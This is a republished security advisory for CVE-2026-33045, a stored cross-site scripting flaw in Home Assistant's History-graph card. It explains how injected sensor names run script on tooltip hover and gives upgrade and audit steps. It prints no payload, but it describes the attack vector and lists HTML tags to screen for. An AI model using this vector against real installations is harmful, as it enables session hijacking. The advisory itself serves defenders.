CVE-2026-33045: CVE-2026-33045: Stored Cross-Site Scripting in Home Assistant History-Graph Card

CVE-2026-33045: Stored Cross-Site Scripting in Home Assistant History-Graph Card

Vulnerability ID: CVE-2026-33045
CVSS Score: 7.3
Published: 2026-03-27

A Stored Cross-Site Scripting (XSS) vulnerability exists in the Home Assistant fronten…


This content originally appeared on DEV Community and was authored by CVE Reports

CVE-2026-33045: Stored Cross-Site Scripting in Home Assistant History-Graph Card

Vulnerability ID: CVE-2026-33045
CVSS Score: 7.3
Published: 2026-03-27

A Stored Cross-Site Scripting (XSS) vulnerability exists in the Home Assistant frontend, specifically within the History-graph card component. The flaw allows authenticated users with low privileges or malicious third-party integrations to inject arbitrary JavaScript via unescaped entity names. This script executes when a victim hovers over the associated graph, potentially leading to full account takeover.

TL;DR

Stored XSS in Home Assistant's History-graph card allows attackers to execute arbitrary JavaScript via manipulated sensor names, leading to session hijacking.

⚠️ Exploit Status: POC

Technical Details

  • CWE ID: CWE-79
  • Attack Vector: Network
  • CVSS v4.0 Score: 7.3 (High)
  • EPSS Score: 0.00047 (14.49%)
  • Impact: Confidentiality, Integrity, Availability (High)
  • Exploit Status: Proof-of-Concept Available
  • CISA KEV Status: Not Listed

Affected Systems

  • Home Assistant Core
  • Home Assistant Frontend
  • History-graph card (ha-chart-base)
  • Home Assistant Core / Frontend: 2025.02 to <2026.01 (Fixed in: 2026.01)

Exploit Details

  • Research Report: Stored XSS payload injected into sensor friendly_name triggered via Chart.js tooltip hover

Mitigation Strategies

  • Upgrade to patched software version
  • Audit database for anomalous sensor names containing HTML elements
  • Implement strict Content Security Policy (CSP)

Remediation Steps:

  1. Navigate to the Home Assistant settings and verify the current installation version.
  2. Update Home Assistant Core to version 2026.01 or later using the built-in update functionality or container redeployment.
  3. Review the entity registry for suspicious names, particularly those linked to external integrations like Android Auto.
  4. Remove or rename any sensors containing <script>, <img>, <iframe>, or other HTML control characters.
  5. Monitor network traffic for unauthorized outbound requests originating from the dashboard.

References

Read the full report for CVE-2026-33045 on our website for more details including interactive diagrams and full exploit analysis.


This content originally appeared on DEV Community and was authored by CVE Reports


Print Share Comment Cite Upload Translate Updates
APA

CVE Reports | Sciencx (2026-03-28T18:40:06+00:00) CVE-2026-33045: CVE-2026-33045: Stored Cross-Site Scripting in Home Assistant History-Graph Card. Retrieved from https://www.scien.cx/2026/03/28/cve-2026-33045-cve-2026-33045-stored-cross-site-scripting-in-home-assistant-history-graph-card/

MLA
" » CVE-2026-33045: CVE-2026-33045: Stored Cross-Site Scripting in Home Assistant History-Graph Card." CVE Reports | Sciencx - Saturday March 28, 2026, https://www.scien.cx/2026/03/28/cve-2026-33045-cve-2026-33045-stored-cross-site-scripting-in-home-assistant-history-graph-card/
HARVARD
CVE Reports | Sciencx Saturday March 28, 2026 » CVE-2026-33045: CVE-2026-33045: Stored Cross-Site Scripting in Home Assistant History-Graph Card., viewed ,<https://www.scien.cx/2026/03/28/cve-2026-33045-cve-2026-33045-stored-cross-site-scripting-in-home-assistant-history-graph-card/>
VANCOUVER
CVE Reports | Sciencx - » CVE-2026-33045: CVE-2026-33045: Stored Cross-Site Scripting in Home Assistant History-Graph Card. [Internet]. [Accessed ]. Available from: https://www.scien.cx/2026/03/28/cve-2026-33045-cve-2026-33045-stored-cross-site-scripting-in-home-assistant-history-graph-card/
CHICAGO
" » CVE-2026-33045: CVE-2026-33045: Stored Cross-Site Scripting in Home Assistant History-Graph Card." CVE Reports | Sciencx - Accessed . https://www.scien.cx/2026/03/28/cve-2026-33045-cve-2026-33045-stored-cross-site-scripting-in-home-assistant-history-graph-card/
IEEE
" » CVE-2026-33045: CVE-2026-33045: Stored Cross-Site Scripting in Home Assistant History-Graph Card." CVE Reports | Sciencx [Online]. Available: https://www.scien.cx/2026/03/28/cve-2026-33045-cve-2026-33045-stored-cross-site-scripting-in-home-assistant-history-graph-card/. [Accessed: ]
rf:citation
» CVE-2026-33045: CVE-2026-33045: Stored Cross-Site Scripting in Home Assistant History-Graph Card | CVE Reports | Sciencx | https://www.scien.cx/2026/03/28/cve-2026-33045-cve-2026-33045-stored-cross-site-scripting-in-home-assistant-history-graph-card/ |

Please log in to upload a file.



There are no updates yet.
Click the Upload button above to add an update.

You must be logged in to translate posts. Please log in or register.

Related Posts